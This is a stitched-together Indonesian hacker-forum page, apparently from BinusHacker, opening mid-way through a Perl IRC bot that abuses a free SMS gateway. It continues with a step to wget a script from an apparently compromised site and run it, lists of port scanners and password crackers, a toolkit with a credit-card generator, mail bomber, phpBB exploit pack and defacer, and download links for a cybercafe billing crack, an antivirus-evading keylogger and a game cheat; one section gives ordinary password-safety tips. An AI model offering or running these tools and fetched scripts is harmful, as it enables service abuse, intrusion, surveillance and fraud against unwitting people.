print $socksms “Content-type: application/x-www-form-urlencoded\r\n”;
print $socksms “Content-length: “.$panjang.”\r\n”;
print $socksms “Connection: Close\r\n\r\n”;
print $socksms $Post;
@hasil = <$socksms>;
close($socksms);
$hasil = join(“”,@hasil);
if($hasil=~ /SMS sedang diproses/){
return 1;
}
else{
return 0;
}
############ END OF BOT SMS ##########
###### SPECIAL THANKS TO ALL MEMBER #BINUSHACKER @ IRC.DAL.NET ########
}
Diatas adalah tampilan untuk perl configuration, SAYA MOHON JANGAN DIHAPUS! Karena Logo tersebut ucapan terima kasih kami kepada penyedia layanan SMS GRATIS Indonesia (NixSMS).
Oke kita lanjut, cara cepatnya adalah:
Silakan download, wget, fetch sourcenya disini: http://www.nordosten.se/includes/js/tabs/smsbot.txt
Setelah selesai wget / fetch / upload filenya,
Kemudian jalankan dengan perintah:
perl smsbot.txt
Setelah itu, tinggal duduk manis menunggu BOT masuk ke channel.
Untuk mengirimkan SMS, ketikkan perintah:
.sms notujuan pesan anda
contoh:
.sms 123456789 halo, apakah anda sudah siap berpuasa?
Oh ya, jangan lupa kalau ada perubahan service di website silakan tanyakan kepada COMEX di IRC.DAL.NET #BINUSHACKER. Kebetulan kelihatan nongol orangnya. Kalau gak bisa dicari di Allnetwork..
Kemudian kalau ingin lebih jelas sourcenya: Silakan Hub [Array] / Kenzhie.
Silakan di explore lebih dalam lagi, agar dapat menggunakan beberapa provider sekaligus.
Selamat mencoba & semoga berhasil :)
Special to all binushacer hacker member, selamat menunaikan Ibadah Puasa.

Download Hacking Tools


Nmap :- This tool developed by Fyodor is one of the best unix and windows based port scanners. This advanced port scanner has a number of useful arguments that gives user a lot of control over the process. Home:- http://www.insecure.org
Latest Release:- Nmap 5.00
Download:- http://nmap.org/download.html
Superscan :- A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.  Home:- http://www.foundstone.com
Latest Release:- SuperScan v4.0
Download:- http://www.foundstone.com/us/resources/proddesc/superscan4.htm
Angry IP Scanner :- A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with a few plugins. Home:- http://www.angryziber.com [sourceforge.net]
Latest Release:- IPScan 3.0-beta3
Download:- http://www.angryziber.com/w/Download
Unicornscan :- Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses. Home:- http://www.unicornscan.org
Latest Release:- Unicornscan 0.4.7-2
Download:- http://www.unicornscan.org
OS Fingerprinting Tools :-
Nmap :- This tool developed by Fyodor is one of the best unix and windows based active os fingerprinting tool. Home:- http://www.insecure.org
Latest Release:- Nmap 5.00
Download:- http://nmap.org/download.html
P0f :- A passive OS fingerprinting tool. P0f is able to identify the operating system of a target host simply by examining captured packets even when the device in question is behind an overzealous packet firewall.P0f can detect firewall presence, NAT use, existence of load balancers, and more! Home:- http://lcamtuf.coredump.cx/p0f.shtml
Latest Release:- p0f v2 (2.0.8)
Download:- http://lcamtuf.coredump.cx/p0f.shtml
Xprobe2 :- Active OS fingerprinting tool. XProbe is a tool for determining the operating system of a remote host. They do this using some of the same techniques as Nmap as well as some of their own ideas. Xprobe has always emphasized the ICMP protocol in its fingerprinting approach. Home:- http://www.sys-security.com [sourceforge.net]
Latest Release:- Xprobe2 0.3
Download:- http://sourceforge.net/projects/xprobe
Password Crackers :-
Cain and Abel :- The top password recovery tool for Windows. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. Home:- http://www.oxid.it
Latest Release:- Cain & Abel v4.9.23
Download:- http://www.oxid.it/cain.html
John the Ripper :- A powerful, flexible, and fast multi-platform password hash cracker. John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. Home:-
Latest Release:- John the Ripper 1.7
Download:- http://www.openwall.com/john/
THC Hydra :- A Fast network authentication cracker which support many different services. When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Home:- http://www.thc.org
Latest Release:- THC-Hydra v5.4
Download:- http://freeworld.thc.org/thc-hydra
L0phtcrack :- Windows password auditing and recovery application
L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc).  Home:- Not Available
Latest Release:- L0phtcrack v5.04
Download:- http://download.insecure.org/stf/lc5-setup.exe
Keygen

Pwdump :- Windows password recovery tool.
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.  Home:- http://www.foofus.net/fizzgig/pwdump
Latest Release:- pwdump6 version 1.7.2
Download:- http://swamp.foofus.net/fizzgig/pwdump/downloads.htm

RainbowCrack :- An Innovative Password Hash Cracker.
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called “rainbow tables”. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.  Home:- http://www.antsight.com
Latest Release:- rainbowcrack v1.2
Download:- http://www.antsight.com/zsl/rainbowcrack/

Brutus :- A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more.  Home: http://www.hoobie.net
Latest Release:- brutus-aet2
Download: http://www.hoobie.net/brutus/brutus-download.html

Tips: Cara Menjaga Password

Tips: Cara Menjaga Password

10 January 2011
Penulis: Artikel   · Kategori Artikel: Tutorial
Binus Hacker Binus Hacker Is Not Criminal Banner





Password merupakan kode-kode rahasia yang harus dijaga keamanannya. Banyak hal negatif yang dapat terjadi ketika password Anda bocor ke tangan orang lain. Simak 7 kiat singkat untuk menjaganya.
1. Tidak Menggunakan Default Password
Default password adalah password yang kita dapat pertama kali. Password standar ini sebaiknya memang harus cepat diganti lantaran sangat rentan. Pasalnya, default password dapat dicari dengan mudah di google search, bahkan di situ tercantum nama mesin, type dan default password terpampang dengan megah di beberapa situs vendor pembuatnya.
Terkadang administrator takut lupa dengan mengubah-ubah default password yang ada, sehingga seorang penyusup dapat mengambil alih sistem dengan default password.
2.Tidak Memakai Password Hint
Terkadang kita takut lupa dengan password yang sudah kita entry ke dalam sistem/account, sehingga kita perlu membuat sebuah pengingat bila kita lupa dengan password tersebut. Nah pengingat ini disebut password Hint, bila kita membuat pertanyaan dengan password hint ini maka dengan cepat kita dapat mengingat kembali password yang lupa tersebut.
Begitu juga dengan para hacker, mereka akan mencoba-coba dengan menebak password kita dengan berbagai pertanyaan di password hint, lama kelamaan password tersebut akan tertebak, bila pertanyaan yang tertera di password hint dapat dijawab oleh si penebak password.
3.Tidak Menuliskan Password
Pemilik password sering kali takut lupa dengan password yang telah dimasukkan, sehingga pemilik password akan menuliskan berbagai user id dan passwordnya ke dalam media lain seperti notebook, notepad, stickies (mac), password folder, buku, handphone dan lainnya.
Hal ini juga cukup rentan bocor. Mengapa rentan? Karena bila berbagai peralatan tersebut hilang, maka semua informasi tentang user id dan password tersebut cepat atau lambat akan diketahui oleh si pencuri peralatan/gadget yang hilang.

4.Menggunakan Password yang Kuat

Pemilik password seringkali menggunakan password yang pendek saja, kalau saja bisa lebih pendek dari 3 character maka user tersebut akan memberikan password yang pendek. Untung saja saat ini sistem memberikan panjang password minimal 6 karakter dan maksimal 254 karakter. Semakin panjang sebuah password maka akan semakin kuat keamanan password tersebut.
Password yang kuat dapat dibuat dengan kombinasi angka dan huruf bahkan berbagai karakter yang lain. Beberapa admin saat ini menggunakan password yang cukup panjang, ditambah dengan enkripsi seperti PGP key dan lainnya, sehingga cukup sulit untuk dapat menebak password tersebut.
5.Sering Mengubah Password
Pemilik password sebaiknya secara berkala mengubah password untuk autentikasi tersebut, semakin sering password berubah semakin baik, karena semakin sulit si penebak password menjebol account/system kita. Perubahan terhadap password tergantung si pemilik, bisa seminggu, sebulan, tiga bulan sekali dan lainnya. Asal si pemilik tidak lupa dengan password yang sudah diubah tadi.

6.Tidak Memakai Password Sama pada Beberapa Account

Pemilik password kadang sering lupa dan sering membuat account yang cukup banyak, sehingga mereka setiap membuat account baru menggunakan user id yang sama dan password yang sama, ini sangat rentan dan bahaya. Karena satu account tembus password ini, maka semua account akan dapat diambil oleh hacker tersebut.
7. Menggunakan Manajemen Password
Untuk membantu mengingatkan kembali berbagai password dan berbagai account, seringkali kita sangat kesulitan, tapi tidak perlu khawatir karena sudah banyak saat ini aplikasi untuk membantu menata password kita. Aplikasi ini dapat didownload secara gratis dari internet maupun berbayar, sehingga berapapun account kita dan berapapun password kita dapat dengan mudah untuk diingat dan dibuka kembali, tentu saja untuk membukanya dengan metode enkripsi juga.

*) Penulis adalah IGN Mantra, Analis Senior Keamanan Jaringan dan Pemantau Trafik Internet ID-SIRTII sekaligus Dosen Keamanan Jaringan dan Cybercrime. www[dot]detik[dot]com

Download Ultra Hacker Toolkits


16 February 2011
Penulis: Artikel   · Kategori Artikel: Hacking
Binus Hacker Binus Hacker Is Not Criminal Banner





Silakan Download Ultra Hacking – Hacker Toolkits, Berikut Adalah Isi Dari Ultra Hacker Toolkits:
AddrView
 AddrView memberi Anda kemampuan untuk menganalisis halaman HTML dan  ekstrak sebagian besar alamat URL, yang terkandung di dalamnya. AddrView  mengambil URL gambar (img - tag), link ke file lain (a - tag), file  CSS, frame, file Flash dan banyak lagi. Anda dapat menyimpan daftar  alamat diekstraksi ke file teks, file HTML atau XML, atau menambahkan  alamat ke pondok.

AnonFTP
 Paket ini berisi / var / ftp area untuk akses FTP anonim.

AppToService
 Program ini memungkinkan baris perintah untuk menjalankan aplikasi biasa sebagai sebuah layanan (layanan).
 Namun, untuk menginstal aplikasi apapun sebagai sebuah layanan adalah  gratis - hanya cukup untuk mengambil rekomendasi dari Windows XP FAQ.

arpinject
 Setiap komputer di jaringan dapat dengan mudah untuk mengambil dan  mengirim ARP_REPLAY paket. Dan dengan demikian membuat perubahan pada  tabel ARP. Serangan semacam ini disebut ARP Poisonig. Hasilnya -  redirect lalu lintas ke host yang diinginkan. Kirim paket (s) dapat  pemrograman dengan menggunakan alat ARPInject.

aspack21
 Sangat bagus wrapper *. exe dan *. dll file (dalam beberapa kasus  tingkat kompresi 70%). Selain itu, program yang baik (terutama untuk  programmer yang mencoba untuk melindungi celana mereka) kompleksitas  dari ekstrak file terkompresi. Saya memahami bahwa ia ASPack dikemas :-)   ASPACK'om sama Tidak buruk, dan bahwa program ini memungkinkan Anda  untuk memeriksa sebelum pekerjaan kemasan akhir "dikemas" file exe-,  dalam pelanggaran operasi normal, uncompress.
 Versi baru telah meningkatkan kecepatan pengepakan dan menambahkan opsi  "kompresi maksimum". Dalam dilaporkan sebagai program berjalan 30 hari.  Antarmuka yang multibahasa, termasuk di Rusia.

bios_pass_remover
 Menghapus password BIOS

Brutus
 Brootforce xs yang

Cable Modem Sniffer
 Lalu Lintas pencegat kabel modem

CapKeys_DIGITAL
 Tombol update einfach per internet. als abspeichern SofCam.key und als moglich textdatei.

CGI Founder v1.043
 Program untuk menemukan lubang-lubang di script CGI.

CGISscan
 Scanner CGI script

cports
 Melihat dan mendengarkan koneksi port pada komputer Anda

Craagle
 Program untuk pencarian otomatis setiap seriynkov dan keygens pada arsip yang relevan.

CreditCardGenerator

DeepUnFreez
 "Lingkungan komputasi Membuat lebih mudah untuk mengelola dan memelihara  Setiap Restart menghancurkan semua perubahan dan reboot komputer ke  keadaan semula., Sampai ke byte terakhir"

E-mail kracker
 Recover lupa password kotak surat yang disimpan di klien e-mail. Program  ini mengemulasikan POP3 server, dan password yang dikirim kembali ke  pengguna. Mendukung setiap POP3 email client.

ezDataBase_Defacer
 Defeyser mesin ezDataBase

FTP Brute pompa kecil
 Brootforce FTP

ftpbr
 Brootforce FTP

~ Censored ~ Mail Bomber 2.3
 Bomer sabun

G00B3RS_phpBB_exploit_pack
 Pak eksploitasi untuk phpBB Motor

Google_Hacker_1.2
 Utility untuk membantu dengan pertanyaan dari seri guglhak

grinder1.1
 Ini membantu Anda menemukan petunjuk dalam file tentukan range IP-address.

HackersAssistant
 paket Software untuk hacker: Port Scanner, Ping Flooder, Server lambat,  Koneksi, File Cleaner, Dapatkan Sandi, IP Validator, Web Browser, Ip  Informasi, HTML Stealer, Situs IP p'gambilan, Winsock Scanner, Koruptor  exe, nuker, Hit Increaser, file Generator, Anonymous e-mail, Whois,  Binary

HackTheGame
 HackTheGame ini game simulator hacker kehidupan. Di mana Anda mengambil  peran hacker. Yang xs untuk apa dan cara memecahkan sistem. Gabung  showdown dengan hack portal, pada umumnya, berumur panjang dan meriah.  Hal utama adalah tidak tertangkap akan menjadi sampah.
Dan banyak lagi …. Have fun & selamat menikmati.
Download link disini:
Fileserve
Mediafire
Shared from mr[dot]setiawan @ k a s k . u s
Nikmati toolsnya & jangan lupa sharing ke yang lain ya :)

Sofware Hack Billing Ecafepro and Explorer

Sofware Hack Billing Ecafepro and Explorer

5 March 2011
Penulis: masterfelix   · Kategori Artikel: Cracking
Binus Hacker Binus Hacker Is Not Criminal Banner





Video Tutorial:
Buat ecafepro: progie nya
http://www.ziddu.com/download/11953924/Language.rar.html
Pass: [url=http://www.ziddu.com/download/11903173/password.txt.html
Buat Bil exp desk pro(registered Version) tutor sama dgn atas progienya
http://www.ziddu.com/download/11953972/bill01.rar.html
Pass:http://www.ziddu.com/download/11927490/bill01.rar.html
ne cuma di buat sampai tanggal 10-04-2011, klo byk yg suka ntar d update atw PM saya pergunakan sebaik2nya dan jgn d salah gunakan.. kerugian suatu pihak di luar tanggung jawab saya 100%

Child safe keylogger

= = = = = = == = ==  = = = = = = = = = = =  = = = = = = = = = = =

keylogger ini kelebihan nya
*  ramah dengan anti virus
*  bisa memblok wab site
*  user monitor, keyboard and screen shot 














Silakan Download software ini gratis
 http://www.sharebeast.com/v4mqtcj4gexe


 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

Remove_Password_Deep_Freeze.exe

= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
alat nie berfungsi untuk mematikan deep freeze segala versi

silakan download

http://www.mediafire.com/?gb36w86o6al3foo

full Hack [test sendiri baru comment]

========================================
[*] F1 | Char Hack and Beret GM[*] F2 | Char Hack and Beret SG[*] F3 | Char Hack and Beret Assault
[*] F4 | Char Hack and Beret AWP[*] F5 | Char Hack and Beret SMG[*] HOME | Char Hack and Beret Secondary
[*] DELETE | Reset Char Hack and Beret
[*] F11 | Spion Mode
[*] PAUSE BREAK | Exit PB << Berguna untuk yg main pake bayar..!!! ckckck :D==========================================
 
Posted Image 

BLACK Baret + Char Hack + Spion Mode [ NEW ]

Hotkey :
[*]Numpad 1 : BLACK Baret + Char Hack
[*]Numpad 0 : Reset Char Hack + Spion Mode ON [ Bomb Mission ]

Cridit : FiX BY FZR
Relased : 16/03/2011
Creator : Dedi[B2]dan FZRThanks To :
[*] All Member n MOderator Blink-Blink(B2)
[*] All Member n Staff sukatoro
[*] BilLz [B2]/PNT
[*] Fauzi Rahman
[*] ►ÐÑ_C◄Diyown|Zixts® [B2]
[*] RCD
[*] HRD
[*] DEDI[B2]
[*] bronx andi [B2]
[*] dan tidak bisa disebut orang " masih bayak
forum support:

[-] blink-blink.forumid.net
[-] Snutz.us

>>DOWLOAD<<